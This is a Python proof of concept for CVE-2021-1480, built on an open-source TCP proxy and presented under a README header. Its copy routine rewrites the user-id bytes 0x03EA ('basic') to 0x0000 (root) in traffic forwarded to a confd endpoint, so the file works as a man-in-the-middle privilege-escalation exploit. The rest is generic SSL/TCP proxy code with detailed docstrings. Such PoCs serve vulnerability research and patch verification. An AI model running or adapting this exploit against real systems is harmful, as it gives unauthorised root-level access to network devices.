README.md
Rendering markdown...
#!/usr/bin/env python
"""
Proof of concept (PoC) for CVE-2021-1480.
Source of the proxy: https://github.com/nccgroup/tcpprox/blob/master/prox.py
"""
"""
TCP Proxy server. Listens on a port for connections, initiates
a connection to the real server, and copies data between the
two connections. Optionally logs the data.
TODO:
- non-blocking connect ?
- possibly do non-blocking ssl handshaking?
- cleaner shutdown?
"""
from socket import *
import errno, optparse, os, platform, socket, ssl, struct, time
from select import *
class Error(Exception):
    """Proxy-specific failure, e.g. raised when SO_ORIGINAL_DST cannot be read."""
def fail(fmt, *args):
    """Print ``error: <fmt % args>`` on stdout, then exit with status 1.

    ``fmt`` is always %-formatted with ``args`` (even when ``args`` is empty).
    """
    message = fmt % args
    print("error: " + message)
    raise SystemExit(1)
def tcpListen(six, addr, port, blk, sslProto, cert=None, key=None):
    """Return a listening server socket bound to ``(addr, port)``.

    six      -- truthy to create an AF_INET6 socket, otherwise AF_INET.
    blk      -- value passed to ``setblocking`` on the returned socket.
    sslProto -- ``ssl.PROTOCOL_*`` constant, or None for plain TCP.
    cert/key -- certificate and optional key file paths; only consulted when
                ``sslProto`` is not None. A missing file ends the process
                through ``fail``.

    If any step after the socket is created raises, the socket is closed
    before the exception propagates, so no descriptor is leaked.

    NOTE(review): ``ssl.wrap_socket`` is kept for Python 2 compatibility; it
    is deprecated on newer Python 3 releases -- confirm the target runtime.
    """
    family = AF_INET6 if six else AF_INET
    s = socket.socket(family, SOCK_STREAM)
    try:
        if six and hasattr(socket, 'IPV6_V6ONLY'):
            # Clear the v6-only flag where the platform exposes it.
            s.setsockopt(IPPROTO_IPV6, IPV6_V6ONLY, 0)
        s.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
        s.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1)
        if sslProto is not None:
            # ``not cert`` guards against os.path.exists(None) raising TypeError.
            if not cert or not os.path.exists(cert):
                fail("cert file %s doesnt exist", cert)
            if key and not os.path.exists(key):
                fail("cert key %s doesnt exist", key)
            s = ssl.wrap_socket(s, ssl_version=sslProto, server_side=True,
                                certfile=cert, keyfile=key)
        s.bind((addr, port))
        s.listen(5)
        s.setblocking(blk)
    except Exception:
        # Do not leak the descriptor when setup fails half-way.
        s.close()
        raise
    return s
def tcpConnect(six, addr, port, blk, sslProto, clientCert=None):
    """Return a client socket connected to ``(addr, port)``.

    The connect itself is performed in blocking mode; ``blk`` is applied with
    ``setblocking`` only after the connection is established.

    six        -- truthy to create an AF_INET6 socket, otherwise AF_INET.
    sslProto   -- ``ssl.PROTOCOL_*`` constant, or None for plain TCP.
    clientCert -- optional base path; ``<clientCert>.cert`` and
                  ``<clientCert>.key`` are presented to the server.

    The socket is closed before re-raising if wrapping or connecting fails,
    so a refused connection does not leak a descriptor.
    """
    s = socket.socket(AF_INET6 if six else AF_INET, SOCK_STREAM)
    try:
        s.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1)
        if sslProto is not None:
            certfile = keyfile = None
            if clientCert is not None:
                certfile = clientCert + '.cert'
                keyfile = clientCert + '.key'
            # The server certificate is deliberately not verified (CERT_NONE).
            s = ssl.wrap_socket(s, certfile=certfile, keyfile=keyfile,
                                cert_reqs=ssl.CERT_NONE, ssl_version=sslProto)
        s.connect((addr, port))
        s.setblocking(blk)
    except Exception:
        s.close()
        raise
    return s
def safeClose(x):
    """Call ``x.close()`` and ignore any ``Exception`` it raises."""
    try:
        x.close()
    except Exception:
        # Best-effort cleanup: a failing close is deliberately ignored.
        return
def getSslVers(opt, enable):
    """Pick the ssl protocol constant for one side of the proxy.

    Returns None when ``enable`` is falsy; otherwise SSLv3 if ``opt.sslV3``,
    TLSv1 if ``opt.TLS``, and SSLv23 as the default.
    """
    if not enable:
        return None
    if opt.sslV3:
        return ssl.PROTOCOL_SSLv3
    if opt.TLS:
        return ssl.PROTOCOL_TLSv1
    return ssl.PROTOCOL_SSLv23
class Server(object):
    """Listening endpoint: each accepted client becomes a Proxy appended to ``q``."""

    def __init__(self, opt, q):
        """Open the non-blocking listening socket described by ``opt``."""
        self.opt = opt
        pem_path = opt.cert + ".pem"
        version = getSslVers(opt, opt.sslIn)
        self.sock = tcpListen(opt.ip6, opt.bindAddr, opt.locPort, 0,
                              version, pem_path, None)
        self.q = q

    def preWait(self, rr, r, w, e):
        """Register the listening socket for readability."""
        r.append(self.sock)

    def postWait(self, r, w, e):
        """Accept one pending client, if any.

        Returns a truthy string only in one-shot mode after the first accept
        (the listening socket is closed at that point); otherwise None.
        """
        if self.sock not in r:
            return None
        try:
            conn, peer_addr = self.sock.accept()
        except ssl.SSLError as exc:
            print("ssl error during accept %s" % (exc,))
            return None
        conn.setblocking(0)
        self.q.append(Proxy(self.opt, conn, peer_addr))
        if not self.opt.oneshot:
            return None
        safeClose(self.sock)
        return 'elvis has left the building'
class Half(object):
    """One socket of a proxied pair.

    Data received on this socket is run through ``opt.filters``, passed
    through the PoC rewrite, and appended to ``dest.queue``; data in this
    object's own ``queue`` is written to this socket.
    """

    # PoC rewrite: the two bytes 0x03EA (user id "basic" per the original
    # comment) are replaced by 0x0000 (root).
    _UID_BASIC = b"\x03\xea"
    _UID_ROOT = b"\x00\x00"

    def __init__(self, opt, sock, addr, dir):
        self.opt = opt
        self.sock = sock
        self.addr = addr
        self.dir = dir
        # Callers pass 'i' for the client side and 'o' for the peer side.
        # Both are truthy, so a plain truth test would label every half
        # "peer"; falsy values still map to "client" as before.
        self.name = "client" if (not dir or dir == 'i') else "peer"
        self.queue = []      # buffers waiting to be sent on self.sock
        self.dest = None     # the opposite Half; set by the owner
        self.err = None      # truthy once this half has failed
        self.ready = False   # True while a previous read may not be drained

    @staticmethod
    def _hex(data):
        """Return ``data`` as a lowercase hex text string (Python 2 and 3)."""
        import binascii
        text = binascii.hexlify(data)
        return text if isinstance(text, str) else text.decode("ascii")

    # XXX handle ssl
    def preWait(self, rr, r, w, e):
        """Register this socket in the select lists for the next wait."""
        if self.ready:
            rr.append(self.sock)
        r.append(self.sock)
        if self.queue:
            w.append(self.sock)

    def postWait(self, r, w, e):
        """Flush pending output and read new input; return ``self.err``."""
        if not self.err and self.sock in w and self.queue:
            self.writeSome()
        if not self.err and self.sock in r:
            self.ready = True
            self.copy()
        return self.err

    def error(self, msg, e):
        """Print the failure, record it in ``self.err`` and return it."""
        print("%s on %s: %r %s" % (msg, self.name, e, e))
        self.err = "error on " + self.name
        return self.err

    def writeSome(self):
        """Send as much of the first queued buffer as the socket accepts."""
        try:
            n = self.sock.send(self.queue[0])
        except ssl.SSLError as e:
            # XXX can we get WantRead here?
            if e.args[0] == ssl.SSL_ERROR_WANT_WRITE:
                n = 0
            else:
                return self.error("send ssl error", e)
        except Exception as e:
            return self.error("send error", e)
        if n != len(self.queue[0]):
            # Partial write: keep the unsent tail at the head of the queue.
            self.queue[0] = self.queue[0][n:]
        else:
            del self.queue[0]

    def copy(self):
        """Read up to 4096 bytes and queue them on ``self.dest``.

        Returns None on success or when the read would block, and the error
        string from ``error`` on EOF or failure.
        """
        try:
            buf = self.sock.recv(4096)
        except ssl.SSLError as e:
            # XXX can we get WantWrite here?
            if e.args[0] == ssl.SSL_ERROR_WANT_READ:
                self.ready = False
                return
            if e.args[0] == ssl.SSL_ERROR_EOF:
                return self.error("eof", e)
            return self.error("recv ssl error", e)
        except socket.error as e:
            if e.errno == errno.EWOULDBLOCK:
                self.ready = False
                return
            return self.error("recv socket error", e)
        except Exception as e:
            return self.error("recv error", e)
        if len(buf) == 0:
            return self.error("eof", 0)

        for mod in self.opt.filters:
            buf = mod.filter(self.addr, self.dir, buf)

        # PoC step: rewrite the user id before forwarding. The match is done
        # on the raw bytes; searching the hex text instead can match across a
        # byte boundary (e.g. 10 3e a0) and report a change that never
        # happened.
        print("Received: {}".format(self._hex(buf)))
        if self._UID_BASIC in buf:
            buf = buf.replace(self._UID_BASIC, self._UID_ROOT)
            print("DATA modified, sending back to the legitimate confd endpoint -> {}".format(self._hex(buf)))

        self.dest.queue.append(buf)
        if self.opt.log:
            now = time.time()
            # Only host and port are logged; IPv6 addresses carry extra fields.
            a = '%s:%s' % tuple(self.addr[:2])
            self.opt.log.write("%f %s %s %s\n" % (now, a, self.dir, self._hex(buf)))
            self.opt.log.flush()

    def close(self):
        """Close the underlying socket, ignoring errors."""
        safeClose(self.sock)
class Proxy(object):
    """A client connection paired with the peer connection it is proxied to."""

    def __init__(self, opt, sock, addr):
        """Wrap the accepted client socket and connect to the destination.

        With ``opt.originalDst`` set, the destination is read from the
        socket via SO_ORIGINAL_DST and stored into ``opt.addr``/``opt.port``.
        Raises Error when that socket option cannot be read.
        """
        print("New client %s" % (addr,))
        self.opt = opt
        if opt.originalDst:
            try:
                raw = sock.getsockopt(socket.SOL_IP, 80, 16)  # SO_ORIGINAL_DST = 80
            except socket.error:
                raise Error("SO_ORIGINAL_DST not supported on this platform")
            # First 8 bytes unpack as: family, port, four IPv4 octets.
            _, port, a, b, c, d = struct.unpack('!HHBBBB', raw[:8])
            print('Original destination was: %d.%d.%d.%d:%d' % (a, b, c, d, port))
            self.opt.addr = '%d.%d.%d.%d' % (a, b, c, d)
            self.opt.port = port
        self.cl = Half(opt, sock, addr, 'i')

        # note: blocking connect for simplicity for now...
        out_version = getSslVers(opt, opt.sslOut)
        upstream = tcpConnect(opt.ip6, opt.addr, opt.port, 0, out_version,
                              opt.clientCert)
        self.peer = Half(opt, upstream, addr, 'o')

        # Cross-link the halves so each one feeds the other's send queue.
        self.cl.dest = self.peer
        self.peer.dest = self.cl
        self.err = None

    def preWait(self, rr, r, w, e):
        """Let both halves register their sockets for the next select."""
        for half in (self.cl, self.peer):
            half.preWait(rr, r, w, e)

    def postWait(self, r, w, e):
        """Service the client half, then the peer half; close both on error.

        Returns the first error seen (truthy) or a falsy value when healthy.
        """
        for half in (self.cl, self.peer):
            if self.err:
                break
            self.err = half.postWait(r, w, e)
        if self.err:
            self.cl.close()
            self.peer.close()
        return self.err
def serverLoop(opt):
    """Run the select loop until no Server or Proxy object remains.

    Every object in the work list exposes ``preWait(rr, r, w, e)`` to
    register sockets and ``postWait(r, w, e)``, which returns a truthy value
    when the object is finished and must be dropped.
    """
    qs = []
    qs.append(Server(opt, qs))
    while qs:
        # note: rr holds "read already ready"
        # meaning it wasnt fully drained last time
        rr, r, w, e = [], [], [], []
        for q in qs:
            q.preWait(rr, r, w, e)
        # Do not sleep in select when some socket still has undrained input.
        timeo = 10.0 if not rr else 0.0
        r, w, e = select(r, w, e, timeo)
        r = set(r).union(rr)
        # Iterate over a snapshot: postWait may append new proxies to qs, and
        # removing from the list being iterated would skip the next entry.
        for q in list(qs):
            if q.postWait(r, w, e):
                qs.remove(q)
    print('done')
def autoCert(cn, caName, name):
    """Create a certificate for ``cn`` signed by the CA ``caName`` and save it as ``name``."""
    import ca  # requires M2Crypto!
    ca_cert, ca_key = ca.loadOrDie(caName)
    new_cert, new_key = ca.makeCert(cn, ca=ca_cert, cak=ca_key)
    ca.saveOrDie(new_cert, new_key, name)
def getopts():
    """Parse ``sys.argv`` and return the populated options object.

    Besides the declared options, the result carries ``addr`` and ``port``
    (from the two positional arguments, unless -O is used) and ``locPort``
    defaults to ``port`` when -L is not given. Invalid combinations end the
    process through ``OptionParser.error``.
    """
    p = optparse.OptionParser(usage="usage: %prog [opts] addr port")
    p.add_option('-6', dest='ip6', action='store_true', help="Use IPv6")
    p.add_option("-b", dest="bindAddr", default="0.0.0.0", help="Address to bind to")
    p.add_option("-L", dest="locPort", type="int", help="Local port to listen on")
    p.add_option("-s", dest="ssl", action="store_true", help="Use SSL for incoming and outgoing connections")
    p.add_option("--ssl-in", dest="sslIn", action="store_true", help="Use SSL for incoming connections")
    p.add_option("--ssl-out", dest="sslOut", action="store_true", help="Use SSL for outgoing connections")
    p.add_option('-3', dest='sslV3', action='store_true', help='Use SSLv3 protocol')
    p.add_option('-T', dest='TLS', action='store_true', help='Use TLSv1 protocol')
    p.add_option("-C", dest="cert", default=None, help="Cert for SSL")
    p.add_option("-A", dest="autoCname", action="store", help="CName for Auto-generated SSL cert")
    p.add_option('-1', dest='oneshot', action='store_true', help="Handle a single connection")
    p.add_option("-l", dest="logFile", help="Filename to log to")
    p.add_option("-m", dest="modules", action="append", default=[], help="filtering modules")
    p.add_option("-O", dest="originalDst", action="store_true", help="Use SO_ORIGINAL_DST for destination")
    p.add_option("-c", dest="clientCert", default=None, help="Client certificate to present to server")
    opt, args = p.parse_args()

    if opt.ssl:
        # -s is shorthand for --ssl-in plus --ssl-out.
        opt.sslIn = True
        opt.sslOut = True
    if opt.sslV3 and opt.TLS:
        p.error("-3 and -T cannot be used together")
    if opt.bindAddr == '0.0.0.0' and opt.ip6:
        opt.bindAddr = '::'
    if opt.originalDst and platform.system() != "Linux":
        p.error("SO_ORIGINAL_DST is only supported in Linux systems")
    if len(args) != 2 and not opt.originalDst:
        p.error("specify address and port or use -O")
    if opt.cert is None:
        # The cert name always gets a default here, so no later
        # "cert missing" check is needed (the old one was unreachable).
        opt.cert = "ca" if opt.autoCname else "cert"
    if not opt.originalDst:
        opt.addr = args[0]
        try:
            opt.port = int(args[1])
        except ValueError:
            p.error("invalid port: " + args[1])
        # Reject numbers that parse but can never be a TCP port.
        if not 0 < opt.port < 65536:
            p.error("invalid port: " + args[1])
    if opt.locPort is None:
        if opt.originalDst:
            p.error("-O requires -L")
        else:
            opt.locPort = opt.port
    return opt
def initModule(modstr):
    """Import and initialise one filter module given as ``name[:args]``.

    Everything after the first ':' is passed verbatim to the module's
    ``init`` function (an empty string when there is no ':'). The imported
    module is returned. An import failure ends the process through ``fail``.
    """
    modname, _, modargs = modstr.partition(':')
    try:
        mod = __import__(modname)
    except ImportError:
        # Pass the name as an argument: pre-formatting the message and then
        # letting fail() format it again breaks when the repr contains '%'.
        fail("could not import %r", modname)
    mod.init(modargs)
    return mod
def main():
    """Parse options, prepare certificate, log and filters, then run the proxy."""
    opt = getopts()
    if opt.sslIn and opt.autoCname:
        # Generate a certificate for the requested CN and serve that instead.
        autoCert(opt.autoCname, opt.cert, "autocert")
        opt.cert = "autocert"
    # open() replaces the Python 2-only file() builtin.
    opt.log = open(opt.logFile, 'w') if opt.logFile else None
    try:
        # A real list (not a lazy map object) because filters are iterated
        # once per received buffer.
        opt.filters = [initModule(m) for m in opt.modules]
        serverLoop(opt)
    finally:
        # Close the log however the loop ends.
        if opt.log is not None:
            opt.log.close()
# Script entry point: start the proxy only when executed directly.
if __name__ == "__main__":
    main()